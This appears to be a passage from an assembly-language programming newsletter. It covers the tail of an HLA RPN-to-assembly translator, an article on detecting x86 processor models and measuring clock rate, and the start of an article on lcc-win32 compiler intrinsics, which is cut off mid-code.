                 pat.a_extract( operand );
                 stdout.put( "   pushd( ", operand, " );" nl );
                 strfree( operand );
                 delete;

               pat.alternate;

                 // Handle the "+" operator.

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneChar( '+' );
                 stdout.put
                 (
                     "   pop( eax );" nl
                     "   add( eax, [esp] );" nl
                 );
                 delete;

               pat.alternate;

                 // Handle the '-' operator.

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneChar( '-' );
                 stdout.put
                 (
                     "   pop( eax );" nl
                     "   pop( ebx );" nl
                     "   sub( eax, ebx );" nl
                     "   push( ebx );" nl
                 );
                 delete;

               pat.alternate;

                 // Handle the '*' operator.

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneChar( '*' );
                 stdout.put
                 (
                     "   pop( eax );" nl
                     "   imul( eax, [esp] );" nl
                 );
                 delete;

               pat.alternate;

                 // handle the '/' operator.

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneChar( '/' );
                 stdout.put
                 (
                     "   pop( ebx );" nl
                     "   pop( eax );" nl
                     "   cdq(); " nl
                     "   idiv( ebx, edx:eax );" nl
                     "   push( eax );" nl
                 );
                 delete;

               pat.if_failure

                 // If none of the above, it must be an error.

                 stdout.put( nl "Illegal RPN Expression" nl );
                 mov( s, ebx );
                 mov( 0, (type str.strRec [ebx]).length );

             pat.endmatch;

         endwhile;

     endfor;

end RPNtoASM;


Consider for a moment the code that matches an identifier or an integer
constant:

        mark;
        pat.zeroOrMoreWS();
        pat.oneOrMoreCset( {'a'..'z', 'A'..'Z', '0'..'9', '_'} );
        pat.a_extract( operand );
        stdout.put( "   pushd( ", operand, " );" nl );
        strfree( operand );
        delete;

The "mark;" invocation saves a pointer into the "s" string where the current
identifier starts.  The pat.zeroOrMoreWS pattern matching function skips over
zero or more whitespace characters.  The pat.oneOrMoreCset pattern matching
function matches one or more alphanumeric and underscore characters (a crude
approximation for identifiers and integer constants).  The pat.a_extract
function makes a copy of the string between the "mark" and the "a_extract"
calls (this corresponds to the whitespace and identifier/constant).  The
stdout.put statement emits the HLA machine instruction that will push this
operand on to the x86 stack for later computations.  The remaining statements
clean up allocated string storage space and delete the matched string from
"s".

Although the "pat.xxxxx" statements look like simple function calls, there's
actually a whole lot more going on here.  HLA's pattern matching facilities,
like SNOBOL4 and Icon, support success, failure, and backtracking.  For
example, if the pat.oneOrMoreCset function fails to match at least one
character from the set, control does not flow down to the pat.a_extract
function.  Instead, control flows to the next "pat.alternate" or
"pat.if_failure" clause.  Some calls to HLA pattern matching routines may even
cause the program to back up in the code and reexecute previously called
functions in an attempt to match a difficult pattern (i.e., the backtracking
component).  This article is not the place to get into the theory of pattern
matching;  however, these few examples should be sufficient to show you that
something really special is going on here.  And all these facilities were
developed using the HLA compile-time language.  This should give you a small
indication of what is possible when using the HLA compile time language
facilities.
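
For readers who want to see the translation itself without the pattern
matching machinery, here is a rough Python sketch of what RPNtoASM does with
one input line.  It is not a port of the HLA program: a regular expression
stands in for the pat.xxxxx calls, and the names TOKEN, EMIT and rpn_to_hla
are invented for this illustration.  The instruction strings follow the
program above; for division the sketch pushes EAX, which is where IDIV leaves
the quotient.

```python
import re

# Optional whitespace, then either an operand or a one-character operator.
TOKEN = re.compile(r"\s*(?:([A-Za-z0-9_]+)|([-+*/]))")

EMIT = {
    "+": ["pop( eax );", "add( eax, [esp] );"],
    "-": ["pop( eax );", "pop( ebx );", "sub( eax, ebx );", "push( ebx );"],
    "*": ["pop( eax );", "imul( eax, [esp] );"],
    "/": ["pop( ebx );", "pop( eax );", "cdq();",
          "idiv( ebx, edx:eax );", "push( eax );"],
}


def rpn_to_hla(line):
    """Translate one RPN line into a list of HLA instruction strings."""
    out = []
    pos = 0
    line = line.rstrip()
    while pos < len(line):
        match = TOKEN.match(line, pos)
        if match is None:
            raise ValueError("Illegal RPN Expression")
        operand, operator = match.groups()
        if operand is not None:
            out.append(f"pushd( {operand} );")
        else:
            out.extend(EMIT[operator])
        pos = match.end()
    return out


for instruction in rpn_to_hla("a b + 2 /"):
    print("   " + instruction)
```

Unlike the HLA version, this sketch has no alternation or backtracking; the
single regular expression does the work of the pat.alternate chain.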

The HLA language is far too rich to describe in this short article (the
*very*
rough documentation for the language is nearly 300 pages long).  For more
information, check out the on-line documentation for HLA at
http://webster.cs.ucr.edu.   Someday, you'll also be able to learn about HLA
via "The Art of Assembly Language Programming, HLA/Windows version." I will
keep interested individuals updated on the progress of AoA at the Webster
web
site.

HLA is totally free.  It is public domain software and there are no
restrictions on its use, the use of the HLA standard library, or the HLA
compiler source code.  Do whatever you want with it and have a lot of fun!

                           rhyde@...
                         http://webster.cs.ucr.edu
                    http://www.cs.ucr.edu/docs/webster/



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                              Processor Identification - Part II
                                              by Chris Dragan & Chili


In the first part of this article I'll explain a lot of different ways to
check for older processors by exploiting bugs, undocumented features, etc.
I'll also show how to write an invalid-opcode exception handler, calculate the
size of the prefetch queue and some other things.  Finally, in the last part
Chris shows how to determine the processor clockrate with the RDTSC
instruction.

Chris didn't have much free time at the moment and so couldn't contribute
more,
therefore I had to put this article together pretty much myself, and I hope
the
quality didn't  go down very much  --  since Chris' texts are definitely
better
than mine.


AAD (ASCII Adjust before Division) Instruction
----------------------------------------------
This instruction allows us to distinguish between at least NEC's V-series and
Intel processors.  AAD, usually used in preparation for a division with DIV or
IDIV, works like this:

    AL = AH * 10 + AL
    AH = 0

That is, it converts the unpacked two-digit BCD number in AX into binary, and
its normal opcode is "0d5h, 0ah".  The difference is that while Intel's chips
allow one to replace the multiplicand with any number (and so build your own
AAD instruction for various number systems), NEC always uses 10 regardless of
the second byte.  So by replacing the second byte with a different number, we
can then check if the operand is actually used, and if not, assume it's a NEC.

                 mov     ax, 0f0fh
                 db      0d5h, 10h       ; opcode for AAD 16
                 cmp     al, 0ffh        ; check if multiplicand was 10 or not
                 jz      _is_Intel
                 jnz     _is_NEC

This should be used as another way (in addition to the one presented in the
first article on this subject) to distinguish the NEC V20/V30 series from the
Intel 8086/88.
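
The arithmetic behind the test is easy to check with a small Python model.
This is only a sketch of the behaviour described above, not processor
documentation; the function name aad and the honours_operand switch are
invented for this illustration.

```python
def aad(ax, imm8=10, honours_operand=True):
    """Model AAD: return the new AX (AL = AH * base + AL, AH = 0).

    honours_operand=False models a chip that always multiplies by 10,
    whatever the second opcode byte says.
    """
    ah, al = ax >> 8, ax & 0xFF
    base = imm8 if honours_operand else 10
    return (ah * base + al) & 0xFF


# "db 0d5h, 10h" with AX = 0f0fh, as in the test above.
print(hex(aad(0x0F0F, 0x10, honours_operand=True)))    # 0xff: operand used
print(hex(aad(0x0F0F, 0x10, honours_operand=False)))   # 0xa5: fixed base 10
```

Only the chip that uses the operand ends up with AL = 0ffh, which is what the
CMP in the test looks for.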


PUSHA Instruction
-----------------
Here is another good way to differentiate NECs from Intel's 8086/88.  Since
V20 and V30 execute all the 80186 instructions, and knowing that PUSHA is
executed on the 8086/88 as "JMP $+2", one can for example, after executing it,
set the carry flag and then see if it was really set.

                 clc                     ; ensure that CF is clear
                 pusha                   ; executed on 8086/88 as JMP $+2
                 stc
                 jc      _is_NEC_or_186plus
                 jnc     _is_808x

                 <whatever code here>
                 .
                 .
                 .

_is_NEC_or_186plus:
                 popa                    ; clean up

Of course the carry flag must not already be set before performing this
test.


POP CS Trick
------------
I'll just show one last way of accomplishing the same.  The trick is that on
an 8086/88 (non-CMOS versions, at least) the opcode "0fh" will perform a POP
CS, on an 80186/188 it is an invalid opcode, generating an INT6 exception,
while NECs and 286+ use that encoding as a prefix byte to indicate new
instructions.  So, to tell NEC's V20/V30 (also V40/V50, I think) and 8086/88
apart, we use the byte string "0fh, 14h, 0c3h", with which the CPU will
perform the following:

       8086/88                 V20/V30
       -------                 -------
    pop     cs              set1   bl, cl
    adc     al, 0C3h

It is then easy to write a piece of code that will distinguish between them:

                 xor     al, al          ; BTW: clears CF
                 push    cs
                 db      0fh, 14h, 0c3h  ; instruction(s) -- see above
                 cmp     al, 0c3h        ; check if ADC was executed
                 je      _is_808x
                 jne     _is_NEC_V20plus

                 <whatever code here>
                 .
                 .
                 .

_is_NEC_V20plus:
                 pop     ax              ; clean up (no POP CS available)

Note that, again, the carry flag must be cleared before execution of this
test.
Also,  just a reminder that this is to be used when you know that the
processor
is not a 186 or above but an older one.


Word Write
----------
On the 8086/88 (+ V20/V30), when a word write is performed at offset 0ffffh in
a segment, one byte will be written at that offset and the other at offset 0,
while an 80186 family processor will write one byte at offset 0ffffh and the
other one byte beyond the end of the segment (offset 10000h).  So all we have
to do is test if it wraps around or not:

                 mov     ax, ds:[0ffffh]         ; save original bytes
                 mov     word ptr ds:[0ffffh], 0aaaah
                 cmp     byte ptr ds:[0], 0aah   ; did 2nd byte wrap around?
                 mov     ds:[0ffffh], ax         ; restore original bytes
                 je      _is_808x
                 jne     _is_8018x

Again, note that this should only be used for the specified processors.
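
The difference can be pictured with a tiny Python model of one segment.  It is
only a sketch of the behaviour described above: the segment is a bytearray
with one extra slot standing for "offset 10000h", and the names write_word and
second_byte_wrapped are invented for this illustration.

```python
SEGMENT_SIZE = 0x10000


def write_word(memory, offset, value, wraps):
    """Store a 16-bit value, low byte first, at `offset`."""
    memory[offset] = value & 0xFF
    high = offset + 1
    if wraps:
        high &= 0xFFFF          # 8086/88 style: wrap to offset 0
    memory[high] = value >> 8   # otherwise: one byte beyond the segment


def second_byte_wrapped(wraps):
    """Repeat the test above: write 0aaaah at 0ffffh, then look at offset 0."""
    memory = bytearray(SEGMENT_SIZE + 1)    # index 0x10000 = past the end
    write_word(memory, 0xFFFF, 0xAAAA, wraps)
    return memory[0] == 0xAA


print(second_byte_wrapped(True))    # the _is_808x case
print(second_byte_wrapped(False))   # the _is_8018x case
```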


Multi-Prefix Instructions
-------------------------
The standard 8086/88 processors have a bug such that they lose multiple
prefixes if an interrupt occurs, while CMOS versions do not, since this bug was
fixed in the 80C86/C88 processors (NEC V20/V30 processors also do not have this
bug -- allowing the following code to also be applicable to them).  If we
execute a string operation with a repeat prefix and also a segment override for
long enough to be interrupted, then, if we are on an 8086/88, the REP prefix
will be lost when the instruction is interrupted, since on return only the last
prefix will be retained.  If instead we are on a low-power consumption CMOS
version, the code will successfully complete.

                 mov     cx, 0ffffh
                 sti
             rep lods    byte ptr es:[si]        ; sure to be interrupted
                 cli
                 jcxz    _not_standard_808x      ; check if REP was completed

                 <if here, then it's just a standard 8086/88>
                 .
                 .
                 .

Just in case you want to use a piece of code like this without having to worry
about that bug, here's how to get it to work correctly every time (with
interrupts enabled -- this time with MOVS):

do_REP:     rep movs    byte ptr es:[di], es:[si]   ; may be interrupted!
                 jcxz    carry_on                    ; if not, carry on,
                 loop    do_REP                      ; else, complete REP
carry_on:
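
Why JCXZ followed by LOOP repairs the count may not be obvious, so here is a
small Python model of the sequence.  It is a sketch under assumptions, not a
description of the silicon: it assumes that CX has already been decremented
for every completed transfer when the interrupt hits, and that the resumed
instruction (now without REP) performs exactly one transfer and leaves CX
alone.  The function names are invented for this illustration.

```python
def rep_string_op(cx, interrupt_after=None, loses_rep=False):
    """Model one 'REP + segment override + string op' instruction.

    Returns (remaining CX, number of transfers performed).
    """
    transfers = 0
    while cx:
        cx -= 1
        transfers += 1
        interrupted = cx and transfers == interrupt_after
        if interrupted and loses_rep:
            # Resumed without REP: one more transfer, CX left untouched.
            return cx, transfers + 1
    return cx, transfers


def copy_with_retry(cx, interrupt_after, loses_rep):
    """Model the do_REP / JCXZ / LOOP sequence; returns total transfers."""
    total = 0
    while True:
        cx, done = rep_string_op(cx, interrupt_after, loses_rep)
        interrupt_after = None      # model a single interrupt only
        total += done
        if cx == 0:                 # jcxz carry_on
            return total
        cx -= 1                     # loop do_REP: pays for the lone transfer
        if cx == 0:
            return total


print(rep_string_op(0xFFFF, 100, loses_rep=True)[0] != 0)   # REP was lost
print(copy_with_retry(10, 3, loses_rep=True))               # all 10 transfers
```

In this model the LOOP instruction's decrement accounts for the one transfer
that ran without REP, so the total always comes out equal to the original CX.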


Invalid-Opcode Exception Handler (INT6)
---------------------------------------
From the 80186 upwards, all processors allow one to implement an
invalid-opcode exception handler, which gives us a great way of telling the
families of CPUs apart.  All one does is hook the INT6 interrupt vector with
our own handler and see if some specific instructions trigger an INT6 or not.
With our handler we trap those exceptions and then toggle a little flag that
shows us the processor doesn't support that instruction.

In the code below I hooked the INT6 vector by changing the IVT (Interrupt
Vector Table) directly, but one can also use DOS services for that.  We then
test which processor we're running on and after that restore things back to
what they were before (except registers; place some push/pop code yourself
according to your needs -- by the way, Robert Collins is a god!).  Anyway, the
code is pretty much self-explanatory:

         ; Hook INT6 -- set up our own handler
                 push    0                       ; point to IVT (0000:0000) --
                 pop     es                      ;  (1 byte saved thanks to Chris!)
                 cli
                 lds     ax, es:[6*4]            ; get original handler vector
                 mov     word ptr es:[6*4], offset INT6_handler ; replace it
                 mov     es:[6*4+2], cs                         ;  with our own
                 sti

         ; Test if processor is at least a 80186 -- Executes "SHL DX, 10"?
                 mov     cx, 1           ; set up invalid-opcode flag
                 shl     dx, 0ah
                 jcxz    unknown_CPU

         ; Test if processor is at least a 80286 -- Executes "SMSW DX"?
                 smsw    dx
                 jcxz    _is_80186

         ; Test if processor is at least a 80386 -- Executes "MOV EDX, EDX"?
                 mov     edx, edx
                 jcxz    _is_80286

         ; Test if processor is at least a 80486 -- Executes "XADD DL, DL"?
                 xadd    dl, dl
                 jcxz    _is_80386

                 <if here, then it's a 80486 or higher processor>
                 .
                 .
                 .

         ; Restore original INT6 handler address -- for all processor types!
                 cli
                 mov     es:[6*4], ax    ; restore original INT6 offset
                 mov     es:[6*4+2], ds  ; restore original INT6 segment
                 sti

                 <whatever code here>
                 .
                 .
                 .

         ; Our own INT6 handler
INT6_handler:
                 xor     cx, cx          ; toggle invalid-opcode flag
                 push    bp
                 mov     bp, sp
                 add     word ptr ss:[bp+2], 3   ; adjust the return address to
                                                 ;  after the invalid opcode (3
                                                 ;  bytes for all)
                 pop     bp
                 iret

Note that this code: 1) should only be used if you know the processor is at
least an 80186; 2) relies on AX, ES and DS, so if you fiddle with their
contents and change them before restoring the original INT6 handler, don't
forget to first save and then restore them; 3) of course, the code in the
INT6_handler should only be executed by means of an INT6!

Maybe a very small extra explanation is required regarding the INT6_handler.
We need to adjust the return address because, when an invalid-opcode exception
is issued, the saved contents of CS and IP (which are pushed onto the stack)
point to the instruction that generated the exception, instead of the next one
(as usually happens for other interrupts).
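
The control flow of the test cascade can be summarised with a short Python
model.  It is only a sketch of the logic, with each processor reduced to a
generation number; the PROBES table and the classify function are invented
for this illustration, and the table simply restates which instruction each
test above relies on.

```python
# (instruction, first generation that executes it, label taken if it traps)
PROBES = [
    ("shl dx, 0ah",  186, "unknown_CPU"),
    ("smsw dx",      286, "_is_80186"),
    ("mov edx, edx", 386, "_is_80286"),
    ("xadd dl, dl",  486, "_is_80386"),
]


def classify(generation):
    """Follow the cascade for a CPU of the given generation (e.g. 286)."""
    cx = 1                              # mov cx, 1
    for instruction, introduced, label in PROBES:
        if generation < introduced:
            cx = 0                      # INT6 fires; handler does xor cx, cx
        if cx == 0:                     # jcxz <label>
            return label
    return "80486 or higher"


for generation in (186, 286, 386, 486):
    print(generation, classify(generation))
```

Each probe is three bytes long, which is why the handler can always skip the
faulting instruction by adding 3 to the saved return address.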


Instruction Prefetch Queue
--------------------------
16-bit processors (i.e., 8086s, 80186s, V30s) have a prefetch queue 6 bytes in
size and replenish the instruction queue once at least two bytes in it are
empty, while their 8-bit bus versions (i.e., 8088s, 80188s, V20s) only have a
4 byte prefetch queue and initiate the prefetch cycle when there is at least
one empty byte in it.

So, knowing this about their Bus Interface Unit design, it isn't difficult to
write some code to distinguish between the two categories.  We'll make a
routine that uses self-modifying code to change the opcode at the fifth byte
and then see if it was executed or not.

                 xor     cx, cx
                 cli                     ; keep the queue from being emptied
                 lea     di, patch
                 mov     al, 90h         ; load NOP opcode
                 stosb                   ; patch fifth byte to a NOP
                 nop
                 nop
                 nop
                 nop
patch:          inc     cx              ; did the INC execute?
                 sti
                 jcxz    _is_8bit

                 <if here, then it's a 16-bit processor>

I believe there is enough time for the prefetch queue to fill, though I have
had no chance to confirm it!

Just in case you want to be on the safe side, here's a routine that will most
certainly work:

                 xor     dx, dx
                 cli                     ; keep an interrupt from emptying
                                         ;  the queue
                 lea     di, patch+2     ; (STOSB writes to ES:DI, so ES = CS)
                 mov     al, 90h         ; load NOP opcode
                 mov     cx, 3
                 std                     ; store backwards: patch+2 .. patch
                 rep     stosb           ; NOP out INC DX and the 2 NOPs
                 nop
                 nop
                 nop
                 nop
patch:          inc     dx              ; did the INC execute?
                 nop
                 nop
                 sti
                 cld                     ; don't leave the direction flag set
                 test    dx, dx
                 jz      _is_8bit

                 <if here, then it's a 16-bit processor>

Again, I must stress that this code should only be used for the specified
processors, since it will without a doubt fail on others.


Do It The Optimized Way!
------------------------
Here is our size-optimized way of determining the processor type. It's an
algorithm that uses Intel's guidelines and distinguishes between pre-80286,
80286, 80386, 80486 without CPUID and 80486+ with CPUID support.

Chris is using a similar routine in his CPU identification utility.

         ; Detection of pre-80286/80286/386+ processors
                 mov     ax, 7202h       ; set bits 12-14 and clear bit 15
                 push    ax
                 popf
                 pushf
                 pop     ax

                 test    ah, 0f0h
                 js      _is_pre286      ; bit 15 of FLAGS is set on pre-286
                 jz      _is_80286       ; bits 12..15 of FLAGS are clear on a
                                         ;  286 processor in real mode (no V86
                                         ;  mode on 286)

                 ; <if here, then it's an 80386 or higher processor>

         ; Detection of 80386/80486(w/out CPUID)/80486+(CPUID compliant)
                 pushfd
                 pop     eax
                 mov     edx, eax
                 xor     eax, 00240000h  ; flip bits 18 (AC) and 21 (ID)
                 push    eax
                 popfd
                 pushfd
                 pop     eax

                 xor     eax, edx        ; check if both bits didn't toggle
                 jz      _is_80386
                 shr     eax, 19         ; check if only bit 18 toggled
                 jz      _is_80486_without_CPUID

                 <if here, then it's an 80486 with CPUID or higher processor>

And so, we got the whole code down to a measly 46 bytes!
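
To make the decision logic of the two tests easier to follow, here is a small
C model of it. It is only a sketch: it never touches the real FLAGS register,
it just classifies the values that the assembly above would have read back.
The enum and function names are invented for this illustration.

```c
#include <assert.h>
#include <stdint.h>

typedef enum { CPU_PRE_286, CPU_286, CPU_386_PLUS } cpu16_class;
typedef enum { CPU_386, CPU_486_NO_CPUID, CPU_486_WITH_CPUID } cpu32_class;

/* flags: the value popped after trying to load 7202h into FLAGS. */
cpu16_class classify_flags_readback(uint16_t flags)
{
    if (flags & 0x8000u)            /* JS: bit 15 is stuck at 1 */
        return CPU_PRE_286;
    if ((flags & 0xF000u) == 0)     /* JZ: bits 12..15 are stuck at 0 */
        return CPU_286;
    return CPU_386_PLUS;
}

/* before: original EFLAGS; after: EFLAGS read back once we have tried
 * to flip bit 18 (AC) and bit 21 (ID). */
cpu32_class classify_eflags_toggle(uint32_t before, uint32_t after)
{
    uint32_t changed = before ^ after;              /* xor eax, edx */

    /* Assumption of this model: only the two probed bits may differ. */
    assert((changed & ~UINT32_C(0x00240000)) == 0);

    if (changed == 0)                               /* neither bit toggled */
        return CPU_386;
    if ((changed >> 19) == 0)                       /* only bit 18 toggled */
        return CPU_486_NO_CPUID;
    return CPU_486_WITH_CPUID;
}
```

For instance, a read-back of 0F202h is classified as pre-286, 0202h as a 286
and 7202h as a 386 or better.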


CR0 Register - Bit 4
--------------------
The 80386 DX may be differentiated from the other models by trying to clear
bit 4 (ET) in the CR0 register. It can be toggled on the 80386 DX, while it
is hardwired to 1 on any of the other family models. So this gives us a good
way to differentiate them: try to clear that bit and then see whether it was
forced back to 1.

         ; Test CR0 register -- bit 4 (ET)
                 mov     eax, cr0
                 mov     edx, eax        ; save original CR0
                 and     al, 11101111b   ; clear bit 4
                 mov     cr0, eax
                 mov     eax, cr0
                 mov     cr0, edx        ; restore original CR0
                 test    al, 00010000b   ; check if bit 4 was forced high
                 jz      _is_a_80386DX_model
                 jnz     _is_not_a_80386DX_and_therefore_is_some_other_model

Note that I'm not sure whether this can be done safely and reliably in
protected mode!


Clockrate
---------
Before the Pentium, it was difficult to determine the processor clockrate. It
was typically based on sophisticated timing loops, which were often
unreliable. With the Pentium, Intel introduced the RDTSC instruction, which
returns the number of clocks since the processor started. The following code
illustrates how to use it.

         ; Determine RDTSC support (assuming that CPUID is supported)
                 mov     eax, 1
                 cpuid
                 test    edx, 10h        ; bit 4 is set when RDTSC is supported
                 jz      _no_rdtsc

         ; Disable all interrupts but timer IRQ0
                 in      al, 21h
                 mov     ah, al
                 in      al, 0A1h
                 push    ax              ; Save previous values
                 mov     al, 0FEh
                 out     21h, al
                 mov     al, 0FFh
                 out     0A1h, al

         ; Assuming that timer runs at 55ms periods, get the clockrate
                 hlt                     ; Wait for timer
                 rdtsc                   ; Read TSC
                 mov     ebx, eax        ; Save lo
                 mov     ecx, edx        ; Save hi
                 hlt                     ; Wait for timer
                 rdtsc                   ; Read TSC
                 sub     eax, ebx        ; Difference lo
                 sbb     edx, ecx        ; Difference hi

         ; Calculate clockrate in MHz
                 mov     ecx, 54925
                 div     ecx
                 mov     [Clockrate], eax

         ; Restore interrupt states
                 pop     ax
                 out     0A1h, al
                 mov     al, ah
                 out     21h, al

The above code can be run in real mode, V86 mode or protected mode in ring 0.
In V86 mode it will hang Pentium and Pentium MMX processors, but on other
processors it will work OK.

In this code, clockrate is determined as: (T2-T1)*PIT/(D*M), where T1 and T2
are the clock counts returned by RDTSC, PIT is the input frequency of the
Programmable Interval Timer (0x1234DD Hz), D is the value by which PIT is
divided (0x10000) and M is 1000000 (we want it in MHz). The constant 54925
used in the code is D*M/PIT rounded down, i.e. one timer period in
microseconds.
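
The same arithmetic can be checked in C. This is just a sketch of the
formula, not a way to read the TSC: the two counter values are passed in as
plain numbers, and the function and macro names are my own.

```c
#include <assert.h>
#include <stdint.h>

#define PIT_INPUT_HZ  1193181u    /* 0x1234DD, PIT input frequency */
#define PIT_DIVISOR   65536u      /* 0x10000, gives the ~55 ms tick */
#define HZ_PER_MHZ    1000000u

/* Exact form of the formula: (T2-T1)*PIT/(D*M). */
uint32_t clockrate_mhz(uint64_t t1, uint64_t t2)
{
    uint64_t clocks;

    assert(t2 >= t1);
    clocks = t2 - t1;
    return (uint32_t)(clocks * PIT_INPUT_HZ /
                      ((uint64_t)PIT_DIVISOR * HZ_PER_MHZ));
}

/* What the assembly does: one division by the tick length in microseconds. */
uint32_t clockrate_mhz_div(uint64_t t1, uint64_t t2)
{
    assert(t2 >= t1);
    return (uint32_t)((t2 - t1) / 54925u);
}
```

With 5500000 clocks counted during one timer tick, both forms give 100 MHz.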


Is This The End?
----------------
I think this is the end as far as old CPUs are concerned, since a lot of
techniques have already been covered here (though there are some more), but
not for other processors, like AMD and IBM and whatever else Chris and I
think up before the next article.

Take the time to visit Chris' web page, where you can find the source for his
CPU identification utility (for Netwide Assembler). His place is at:
         http://ams.ampr.org/cdragan/

Also, here are some other sources of information that you might want to take
a look at (available somewhere on the net -- since I don't remember where I
got them from):

         WHATCHIP.ASM                           (Christy Gemmell)
         86BUGS.LST                             (Harald Feldmann/Hamarsoft)
            [distributed with Ralf Brown's Interrupt list]
         OPCODES.LST                            (Potemkin's Hackers Group)
            [distributed with Ralf Brown's Interrupt list]
         cpu.asm                                (Robert Mashlan)
         WHATCPU.ASM                            (Dave M. Walker)
         COMPTEST 2.60                          (Norbert Juffa)
         Ralf Brown's Interrupt List:
            http://www.cs.cmu.edu/~ralf/files.html

These are in addition to the ones already referenced in the first article of
this series.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                      The LCC Intrinsics Utility
                                                                     Jacob Navia


Lcc-win32 is a free C compiler system. It features an IDE, a resource
compiler, a linker, a librarian, a windowed debugger, and other goodies.

Here, I would like to describe a special feature of lcc-win32 that will
surely be appreciated by colleagues who use assembly.

Lcc-win32 understands special macro definitions called intrinsics. These
constructs are seen as normal function calls by the front end of the
compiler, but are expanded inline by the back end.

You can add your own intrinsic macros to the system, allowing you to use the
power and speed of assembly language within the context of a more powerful
and safer high level language.

I will present two examples here, to give you an idea of what this can look
like. You will need the source code of lcc-win32, which can be obtained at
the home page: http://ps.qss.cz/lcc or ftp://ftp.cs.virginia.edu/pub/lcc-win32

Inlining the strlen function
----------------------------
Let's assume the strlen function of the C library is just too slow for you.
Instead of generating:
      pushl     Arg
      call _strlen
      addl $4,%esp

you would like to generate inline the following code:
; Inlined strlen. The input argument is in ECX and points to the
; character string
      orl     $-1,%eax
loop:
      inc     %eax
      cmpb    $0,(%ecx,%eax)
      jnz     loop
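
For readers more at home in C, the loop above corresponds roughly to the
following function. It is only a model of the five instructions, written to
show why the counter starts at minus one; the function name is made up and is
not part of lcc-win32.

```c
#include <assert.h>
#include <stddef.h>

size_t inline_strlen_model(const char *s)
{
    size_t n = (size_t)-1;          /* orl  $-1,%eax                   */

    assert(s != NULL);
    do {
        n++;                        /* inc  %eax (first pass: -1 -> 0) */
    } while (s[n] != '\0');         /* cmpb $0,(%ecx,%eax) ; jnz loop  */
    return n;                       /* the result is left in EAX       */
}
```

Starting at minus one lets the increment sit at the top of the loop, so the
loop body needs no separate exit adjustment.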

This function, then, should be inlined by the compiler. The C interface would
be:
      _strlen(str);

The prototype must be:

extern int _stdcall _strlen(char *);

The compiler recognizes intrinsic macros because they have an underscore as
the first character of their names, they are declared _stdcall, and they
appear in the intrinsics table. Functions that begin with an underscore are
few, so this avoids looking up the intrinsics table for each function call,
which would slow down compilation.
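
The idea of the cheap underscore test in front of the table search can be
sketched as follows. This is not the lcc-win32 source: the entry type is cut
down to two fields, and the names intrinsic_entry, demo_table and
find_intrinsic are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

typedef struct {
    const char *name;       /* intrinsic name, always starts with '_' */
    int         nargs;      /* number of arguments                    */
} intrinsic_entry;

static const intrinsic_entry demo_table[] = {
    { "_bswap",  1 },
    { "_emms",   0 },
    { "_strlen", 1 },
    { NULL,      0 }        /* end marker, as in the real table */
};

const intrinsic_entry *find_intrinsic(const char *name)
{
    const intrinsic_entry *e;

    assert(name != NULL);
    if (name[0] != '_')             /* most calls are rejected right here */
        return NULL;
    for (e = demo_table; e->name != NULL; e++)
        if (strcmp(e->name, name) == 0)
            return e;
    return NULL;
}
```

A call to an ordinary function such as strlen costs one character comparison;
only names with a leading underscore pay for the linear search.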

You then take the file intrin.c in the sources of lcc-win32 and modify the
intrinsics table. Its declaration is in the middle of the file, and looks
like this:


static INTRINSICS intrinsicTable[] = {
      {"_fsincos",2, 0,             fsincos,  NULL      },
      {"_bswap",     1,   0,        bswap,    bswapArgs },

     ... many declarations omitted ...

      {"_reduceLtb",3,    0,        redCmpLtb,     paddArgs  },
      {"_mmxDotProduct",3,0,             mmxDotProd,    paddArgs  },
      {"_emms",0,         0,        emms,          NULL      },
      {NULL,         0,   0,        0,             0    }
};


Before the last line, you add the following line:

      {"_strlen",1,       0,        strlenGen,     strlenArgs     },

telling the system that you want an intrinsic called _strlen that takes one
argument, whose code will be generated by the function strlenGen(), and whose
arguments are assigned to their respective registers by the function
strlenArgs(). These functions should assign the registers in which you want
the arguments to the inline macro, and generate the code for the body of the
macro. Basically, these macros are seen as special calls by the compiler,
which, instead of generating a push instruction, will call your <arguments>
function. That function should set the right fields in each node passed to
it, so that the code generator later generates a move to the registers
specified.

Note that all intrinsics should start with an underscore to avoid conflicting
with user space names.

When a call to this function is detected by the compiler, you will first be
called when pushing the arguments at each call site.  Here is the function
strlenArgs() then:

static Symbol strlenArgs(Node p)
{
      Symbol r=NULL;

      //The global ArgumentsIndex is zero before each call. The compiler
      //takes care of that.
      switch (ArgumentsIndex) {
      case 0: // First argument pushed, from right to left!
           if (p->x.nestedCall == 0) {
                r = SetRegister(p,intreg[ECX]);
           }
           break;
      }
      // We have seen another argument
      ArgumentsIndex++;
      // Assign the register to this expression.
      if (p->x.nestedCall == 0 && r)
           p->syms[2] = r;
      // There should never be more than one argument
      if (ArgumentsIndex == 1)
           ArgumentsIndex = 0;
      return r;
}

You see that in several places we have the test:

      if (p->x.nestedCall == 0)

This means that we should check if we have a nested call sequence within the
arguments, i.e. the following C expression:

      strlen( SomeFunction() );

True, in the case of strlen this doesn't change anything important: the
result of the function will be in EAX anyway. But suppose you defined a macro
that takes two arguments, say, some special form of addition sadd(a,b). In
this case we would assign the second argument (from left to right) to ECX,
and the first to EAX. Consider then the case of:

      sadd( SomeFunction(),5);

If we just assigned 5 to ECX, then the call to SomeFunction() would destroy
the contents of ECX during the call!

This means that when the compiler detects a call within argument passing,
all arguments WILL BE on the stack, and our code generating function should
take care of popping them into the right registers before proceeding.

In the case of strlen this can hardly happen, but it's important to see how
this would work in the general case.

Note too that the argument function should increase the global argument
counter for each argument, and reset it to zero when it's done. Again, this
is not necessary for strlen, but for macros that take more arguments it is
mandatory.

The SetRegister function takes care of the details of assigning a register.
Here is its short body:

Symbol SetRegister(Node p,Symbol r)
{
      Symbol w;

      w = p->kids[0]->syms[2];
      if (w->x.regnode == NULL || w->x.regnode->vbl == NULL)
           p->kids[0]->syms[2] = r;
      return r;
}

This function tests that in the given node, the left child isn't already
assigned to a register. It will assign the register only if this is not the
case. Otherwise, the compiler will generate the move.

We come now to the center of the routine: generating code for the strlen
utility.

static void strlenGen(Node p)
{
      static int labelCount;

      // OK, the first thing to do is to see if we should pop our arguments.
      // If that is the case, pop them into the right registers.
      if (p->x.nestedCall) {
           print("\tpopl\t%%ecx\n");
